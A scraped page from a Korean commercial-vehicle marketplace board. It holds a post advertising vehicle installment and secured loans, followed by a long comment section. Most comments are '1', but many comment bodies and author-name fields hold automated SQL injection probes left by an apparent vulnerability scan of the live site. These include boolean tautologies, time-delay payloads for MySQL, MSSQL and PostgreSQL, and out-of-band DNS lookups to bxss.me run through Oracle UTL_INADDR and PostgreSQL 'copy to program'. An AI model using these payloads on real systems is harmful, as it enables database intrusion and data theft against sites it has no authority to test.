버스/승합차 직거래 사이트! 버스4989 에 오신 것을 환영합니다.

아이디

비밀번호

 

 

 

 

 

글  쓴  이

   윤기홍

조  회  수

5093

제       목

   캐피탈 할부 및 최저금리 담보대출 상품안내

등  록  일

19/04/20

 

 

○ 대상 : 화물차, 특장차, 상용차, 중장비, 건설기계 담보대출



○ 조건 : 구입자금

ㆍ신 차 금리 : 5.4% ~
ㆍ중고차 금리 : 6.9% ~
ㆍ대출 한 도 : 구입차량 시세 X130%
ㆍ대출 기 간 : 24개월 ~ 72개월
ㆍ가용 년 식 : 1998년식 ~


○ 조건 : 운영자금

ㆍ운영 금 리 : 6.9% ~
ㆍ대출 한 도 : 현재 남은 할부금 잔액 + 필요자금
ㆍ대출 기 간 : 24개월 ~ 72개월


○ 조건 : 환승론 [전환대출]

ㆍ운영 금 리 : 6.9% ~
ㆍ대출 한 도 : 현재 남은 할부금 잔액
EX) 고 금리를 ➡ 5.9% 저금리로 전환 [갈아타기]
ㆍ대출 기 간 : 24개월 ~ 72개월 [남은 개월수 그대로 가능]

구입자금, 운영자금, 환승론 전액대출 최고한도 최저금리!

믿음과 신뢰를 바탕으로 최적의 커머셜 할부를 제공해드리겠습니다.

☎ 상담전화 : 010 - 5492 - 1177

www.캐피탈할부.com

 

IP Address : 121.191.23.117

 

 

* 등록자 : 김정우   등록일: 2020-07-06 13:42:35   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:55   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:55   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:56   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:56   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:57   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:57   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:58   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:58   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:59   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:19:00   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:19:01   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:19:01   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:19:03   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:19:03   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:19:04   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:19:06   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:19:06   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:20:13   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:20:13   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:20:14   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:20:14   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:20:16   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:20:17   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:20:19   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:26   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:27   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:28   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:28   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:29   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:32   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:33   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:56   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:57   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:57   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:58   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:59   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:59   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:00   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:00   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:01   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:01   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:02   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:02   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:03   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:03   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:04   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:04   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:05   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:23   

1'"

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:24   

\

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:24   

1위웬%2527%2522

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:25   

@@9UEvk

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:25   

JyI=

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:26   

'"

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:26   

''""

 

* 등록자 : 1'"   등록일: 2020-07-06 14:23:30   

1

 

* 등록자 : \   등록일: 2020-07-06 14:23:30   

1

 

* 등록자 : 1위웬%2527%2522   등록일: 2020-07-06 14:23:31   

1

 

* 등록자 : @@zhFsB   등록일: 2020-07-06 14:23:31   

1

 

* 등록자 : JyI=   등록일: 2020-07-06 14:23:32   

1

 

* 등록자 : '"   등록일: 2020-07-06 14:23:33   

1

 

* 등록자 : ''""   등록일: 2020-07-06 14:23:33   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:22   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:22   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:23   

-1 OR 2+553-553-1=0+0+0+1 --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:23   

-1 OR 2+392-392-1=0+0+0+1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:24   

-1' OR 2+450-450-1=0+0+0+1 --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:24   

-1' OR 2+784-784-1=0+0+0+1 or 'v9QPUnS0'='

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:25   

-1" OR 2+42-42-1=0+0+0+1 --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:25   

if(now()=sysdate(),sleep(27),0)/*'XOR(if(now()=sysdate(),sleep(27),0))OR'"XOR(if(now()=sysdate(),sleep(27),0))OR"*/

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:26   

(select(0)from(select(sleep(27)))v)/*'+(select(0)from(select(sleep(27)))v)+'"+(select(0)from(select(sleep(27)))v)+"*/

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:26   

-1; waitfor delay '0:0:27' --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:27   

-1); waitfor delay '0:0:9' --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:27   

1 waitfor delay '0:0:9' --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:28   

HVUkLymr'; waitfor delay '0:0:9' --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:29   

-1;select pg_sleep(9); --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:29   

-1);select pg_sleep(18); --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:31   

-1));select pg_sleep(18); --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:31   

bnJEf9tR';select pg_sleep(18); --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:32   

RooZWvEM');select pg_sleep(27); --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:32   

D4XBGM4X'));select pg_sleep(27); --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:33   

1||UTL_INADDR.get_host_address('dns.'||'sqli.013405.3171-1467.3171.d8861.1.bxss'||'.me')

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:33   

'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.3171-1468.3171.d8861.1.bxss'||'.me')||'

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:34   

1;copy (select '') to program 'nslookup dns.sqli.\013405.3171-1469.3171.d8861.\1.bxss.me'

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:34   

1';copy (select '') to program 'nslookup dns.sqli.\013405.3171-1470.3171.d8861.\1.bxss.me

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:35   

137'

 

* 등록자 : 김정우   등록일: 2020-07-06 14:26:38   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:26:39   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:26:39   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:26:40   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:26:41   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:26:41   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:26:42   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:27:31   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:27:32   

1

 

* 등록자 : -1 OR 2+328-328-1=0+   등록일: 2020-07-06 14:27:32   

1

 

* 등록자 : -1 OR 2+196-196-1=0+   등록일: 2020-07-06 14:27:33   

1

 

* 등록자 : -1' OR 2+292-292-1=0   등록일: 2020-07-06 14:27:33   

1

 

* 등록자 : -1' OR 2+651-651-1=0   등록일: 2020-07-06 14:27:34   

1

 

* 등록자 : -1" OR 2+34-34-1=0+0   등록일: 2020-07-06 14:27:34   

1

 

* 등록자 : if(now()=sysdate(),s   등록일: 2020-07-06 14:27:35   

1

 

* 등록자 : (select(0)from(selec   등록일: 2020-07-06 14:27:35   

1

 

* 등록자 : 1 waitfor delay '0:0   등록일: 2020-07-06 14:27:36   

1

 

* 등록자 : nTzSCEuC'; waitfor d   등록일: 2020-07-06 14:27:36   

1

 

* 등록자 : ktAO4KQd';select pg_   등록일: 2020-07-06 14:27:37   

1

 

* 등록자 : vWEfC9yC');select pg   등록일: 2020-07-06 14:27:38   

1

 

* 등록자 : zfxOCiZa'));select p   등록일: 2020-07-06 14:27:38   

1

 

* 등록자 : '||UTL_INADDR.get_ho   등록일: 2020-07-06 14:27:39   

1

 

* 등록자 : 김정우';copy (select   등록일: 2020-07-06 14:27:39   

1

 

* 등록자 : 190'   등록일: 2020-07-06 14:27:40   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:32:47   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:32:48   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:14   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:15   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:16   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:16   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:17   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:17   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:18   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:19   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:19   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:20   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:20   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:21   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:22   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:22   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:23   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:24   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:24   

1

 

 

 

글쓰기


 

 

 

 

 

버스4989 소개 | 버스4989 광고안내 | 회원약관 | 개인정보취급방침 | 이메일무단수집거부 | 제휴문의 | 고객센터

 

소 재  / 상 호

:

인천광역시 남구 미추홀대로 637 2층 (우)22155  버스4989  / 대 표 : 조 호 경

관    리     자

:

조호선 과장  

버스4989 회원 이메일주소 무단수집거부

대  표  전  화

:

010-2556-4000

 FAX : 070-8259-2243  

TRUCKS@NATE.COM

소            개

:

버스4989는 인터넷 트럭직거래 및 검색사이트로써 트럭을 직접 매매하지 않습니다 

버스4989의 모든 이미지&제작기법은 저작권자 허락없이 무단 사용할 경우 저작권법에 의해 처벌됩니다.

COPYRIGHT BY  BUS4989.NET  &  버스4989    2006. 03   ALL RIGHT RESERVED